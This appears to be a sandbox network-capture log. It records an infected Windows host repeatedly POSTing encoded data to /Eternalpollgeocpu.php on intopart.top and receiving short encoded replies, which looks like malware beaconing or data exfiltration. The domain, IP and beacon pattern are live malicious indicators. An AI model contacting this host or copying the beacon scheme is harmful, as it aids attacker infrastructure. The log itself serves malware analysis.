Apr 29, 2024 01:04:16.175652981 CEST	1080	OUT	Data Raw: 58 5d 5f 5a 55 5f 5b 52 54 56 50 51 5a 54 51 55 5b 5c 5e 48 54 52 50 42 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X]_ZU_[RTVPQZTQU[\^HTRPB]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$%- ,X1-6//'-0[>:)=7Q&#3S/?9"0:$ Z/!Z/,
Apr 29, 2024 01:04:16.582658052 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=py9OkFjABzl0jCgeQaWoXJIx%2BYg56AASNtRw7vlpdcFs349cUmGrqethrf0FZFK5IIrdkvYH%2BMw9l3m6XMkbxdyJ%2BiDVaDD79wK6lfjCsZ1euwMMxqnqMp%2F62pc1G8k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0bccce2e174-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:16.582680941 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	49864	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:16.192981005 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:04:16.303087950 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:16.303260088 CEST	1788	OUT	Data Raw: 58 5e 5f 5c 55 5a 5e 52 54 56 50 51 5a 57 51 57 5b 5b 5e 44 54 53 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X^_\UZ^RTVPQZWQW[[^DTSPF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1>0^4!$%-6/%/3= Y(*< 03'T8643-' Z/!Z/
Apr 29, 2024 01:04:16.720676899 CEST	728	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yp0VW2GUVBJOWpuTHQ86M5NUWTEWiucCg35%2FDWC%2FMsOZsuYPqu5MQTGj9r8COpFP2xSRMvhUcYWGdhoTfGcyoeiwlsghpoCgtkMqnnUfxwvI5Hyvm9c4rHL6tEykjcU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0bd9ed1615b-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 5d 3c 28 26 0b 29 0c 0f 0a 27 0c 3b 51 26 11 28 0b 3d 2f 2a 42 25 20 24 5e 38 3e 3e 1b 33 37 23 03 23 29 27 01 31 32 30 0c 2a 24 20 59 02 1c 39 09 25 2a 31 00 32 00 09 59 2b 54 39 5f 35 3e 24 1e 3e 06 25 08 27 3f 2e 04 3e 30 3e 1f 2b 2a 2f 0c 39 04 26 03 27 34 2f 57 3f 25 2c 52 08 13 20 10 2b 20 1d 0f 36 06 19 52 27 21 25 06 25 0b 28 09 35 3b 34 56 3c 5f 24 59 27 21 2a 5c 31 32 3e 56 2c 20 23 41 37 12 2d 13 33 3d 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 ]<(&)';Q&(=/B% $^8>>37##)'120$ Y9%12Y+T9_5>$>%'?.>0>+/9&'4/W?%,R + 6R'!%%(5;4V<_$Y'!*\12>V, #A7-3=!\/ I4]S
Apr 29, 2024 01:04:16.720695019 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	49865	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:16.812655926 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:16.923571110 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:16.923774004 CEST	1080	OUT	Data Raw: 5d 58 5f 5c 55 5c 5e 54 54 56 50 51 5a 53 51 57 5b 52 5e 48 54 5e 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]X_\U\^TTVPQZSQW[R^HT^PH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$20#Y$==_/64$=<^))>+03#8!X7 &' Z/!Z/0
Apr 29, 2024 01:04:17.201752901 CEST	566	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kTzdsGGwMwMC6QashiGh0f33XFeAqCLwbabNg9sjMpfEbiQ7qwUEW7tLpuyPVISmnQbyQj966DNNDxb3so5wTgBSJPJbrBwVzj8D6PQMVCa28SNseN8zp1NhZgId0Jo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0c17f6b13f9-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:04:17.201766968 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:17.201777935 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	49866	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:17.446192026 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:17.556068897 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:17.556217909 CEST	1080	OUT	Data Raw: 58 5e 5a 5e 55 5b 5e 51 54 56 50 51 5a 51 51 52 5b 5e 5e 45 54 5d 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X^Z^U[^QTVPQZQQR[^^ET]PD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'\2-$_#T'2X![;$T3$>)=S'3;Y&"0)$ Z/!Z/
Apr 29, 2024 01:04:17.967308998 CEST	577	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sKpXj1xAUz93ZEdeIEn7lXvuoWzzwOvQJRu63GtTXrTpyWPb4KhFkK1bCmPZOPAWJRfcMxgQbGrQBtRsBF7thb6kR0dfiqjDDhGzq3DMfV2dhY9RTOC1uQ3Bj%2FcTHpk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0c56c9e105c-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:17.967324972 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	49867	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:18.206595898 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:18.318101883 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:18.318243980 CEST	1080	OUT	Data Raw: 58 59 5a 51 50 5b 5e 55 54 56 50 51 5a 50 51 57 5b 52 5e 43 54 5a 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XYZQP[^UTVPQZPQW[R^CTZPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&;#2X&=6-&/$./>-?P'#(,/5Z U6]&* Z/!Z/<
Apr 29, 2024 01:04:18.599206924 CEST	574	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0mklgJGYkDyaBjhh0AYB83DSM4mSGR9BYUM4TaBmlxx4nRXuc32diucDQkfyqbZNqOioB5863LVVoGG%2FRlbMbkAfd7o6QsFNvuZv0w0jRZFzIRxeML%2B6%2B%2FC8vXtYiY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0ca2cad022a-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:04:18.599227905 CEST	14	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<ZYT0

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	49868	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:18.832109928 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:18.943492889 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:18.943733931 CEST	1080	OUT	Data Raw: 5d 5a 5a 5b 55 56 5e 51 54 56 50 51 5a 5e 51 51 5b 5c 5e 40 54 58 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]ZZ[UV^QTVPQZ^QQ[\^@TXPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Z1=#21-",,U$;**-(7P$#<;?%\ 5' Z/!Z/
Apr 29, 2024 01:04:19.336375952 CEST	591	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MRP3pG7ONLNCzG4V%2BqIMf4JyfrW9hszXtp8KFIqtrOqvejR%2F%2Bdjs3W72hR6I1cju%2FvLb9Kygf4%2FMzhUewuGi1mylQ%2FBFO%2FN5HCIDZMBfV0%2B451PMr3QVnn4yLPv2oPo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0ce1b706393-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:19.336498022 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	49869	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:19.569267035 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:19.680035114 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:19.680300951 CEST	1080	OUT	Data Raw: 58 5d 5a 5e 55 57 5e 52 54 56 50 51 5a 51 51 55 5b 5e 5e 45 54 5d 50 45 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X]Z^UW^RTVPQZQQU[^^ET]PE]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'X%=#2<%.=];,3.0[=:+?R3'U/,%] )3: Z/!Z/
Apr 29, 2024 01:04:20.099668026 CEST	587	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UaxGz%2FzlLXlxogwbzCg7CZNwq58CkWI36I%2BI9InbiYt44Fv258m%2BezOJy22SfbjP6197QMhwhB1%2Bk3cJ3RMRyO4WzPH4d%2Bpkr6Xei3wzUUMO2Z%2BOieZMhsCqKsMMr2Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0d2a974225b-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:20.099687099 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49870	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:20.331696033 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:20.442259073 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:20.442420006 CEST	1080	OUT	Data Raw: 58 5f 5a 5a 50 5a 5b 53 54 56 50 51 5a 54 51 51 5b 5b 5e 42 54 5e 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X_ZZPZ[STVPQZTQQ[[^BT^PG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'&< "3$-9/C#$=8():R+[7W0U'-/&#!0 Z/!Z/,
Apr 29, 2024 01:04:20.727821112 CEST	572	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKiX1J6Bs%2FyiBOczgJUkqMBMbsysG2AQ%2B0YCGA9EYvh0DJL2a0wurcmuyjJintghu2T7RznM7gjLWFyHVORZB6nLcs%2BZX0OKVwaw6mvmyO9cl688lppOj9iFDe4uqiM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0d77af72b10-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:04:20.727878094 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:20.727994919 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49871	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:20.956155062 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:21.067795038 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:21.068058014 CEST	1080	OUT	Data Raw: 58 5c 5f 5d 55 57 5b 57 54 56 50 51 5a 54 51 56 5b 58 5e 42 54 5a 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X\_]UW[WTVPQZTQV[X^BTZPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1>#!18_&X5[, P'-;):2V?[+Q0?;<>#3*0 Z/!Z/,
Apr 29, 2024 01:04:21.376578093 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h2abBkQGwkLOJvMmW7cmE%2FjT18POY3%2B%2B1yPxG%2BaoxPFh3Gt1%2FHiH2bGVucijbGvZFf7U2SdYR0pm1MThWAtYy43h3wuGJhBdgEBpC0ehBs2TT8an4RoUJizImm6EEtw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0db5abe86e4-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:21.376629114 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	49872	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:21.610028028 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:04:21.720218897 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:21.720475912 CEST	1080	OUT	Data Raw: 58 5b 5f 5a 55 58 5e 52 54 56 50 51 5a 52 51 56 5b 5d 5e 44 54 58 50 46 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X[_ZUX^RTVPQZRQV[]^DTXPF]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'X1^4<&&,%'[ (&V(>0$0'R89[ U:\3 Z/!Z/4
Apr 29, 2024 01:04:22.141369104 CEST	577	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ijLmHFpssGsi0fHYTdy6H1sPzXl68Cx72gM9Nk7w17aFN7NfcOObmtk3fsIrC4GvxKbNLei%2FFDrmOeSVrxryQClZSS63DbAKZFFWSjkMJIkbTi9zxBpYab3J8SPhP0I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0df6c8e10ae-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:04:22.141390085 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	49873	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:21.834001064 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:04:21.944144964 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:04:21.944355965 CEST	1788	OUT	Data Raw: 58 59 5f 5d 55 5b 5b 55 54 56 50 51 5a 53 51 56 5b 5b 5e 43 54 58 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XY_]U[[UTVPQZSQV[[^CTXPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'20]#2?&:85$<>9.R<>/$#S;? :$ Z/!Z/0
Apr 29, 2024 01:04:22.345143080 CEST	732	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:04:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2FTmLrRFgU7REM6Df8sul7ns6EGsxevkwuAR99WdMBdM8h%2F06vyXGWoTbZV53EYKgOAtq9gKmABB1ixYWJFfsnSRIZq1YPBcJW14%2BPvbm9kL%2BdCUD2dHtVRuUFisvbI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0e0d80602b8-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 5c 2b 2b 2a 0b 3d 0c 32 16 27 32 20 0a 32 01 0a 41 29 2c 36 09 31 20 27 04 2c 2e 2e 53 24 42 20 5f 37 00 28 12 31 21 3f 51 3c 0e 20 59 02 1c 39 41 31 29 21 02 25 3e 23 16 28 31 35 59 23 2e 38 1e 2a 16 26 57 30 3f 3d 58 3c 20 2e 5c 28 17 20 54 2e 13 29 15 27 27 3b 1d 3f 0f 2c 52 08 13 20 52 28 23 38 1f 35 06 3b 1d 25 32 22 5c 27 25 3b 1b 35 01 20 57 28 39 23 00 24 54 39 02 27 22 3a 13 2c 20 2f 08 37 3c 39 11 33 17 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 \++=2'2 2A),61 ',..S$B _7(1!?Q< Y9A1)!%>#(15Y#.8&W0?=X< .\( T.)'';?,R R(#85;%2"\'%;5 W(9#$T9'":, /7<93!\/ I4]S
Apr 29, 2024 01:04:22.345279932 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	49874	172.67.144.153	80

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:04:22.374492884 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1076 Expect: 100-continue
Apr 29, 2024 01:04:22.484631062 CEST	25	IN	HTTP/1.1 100 Continue
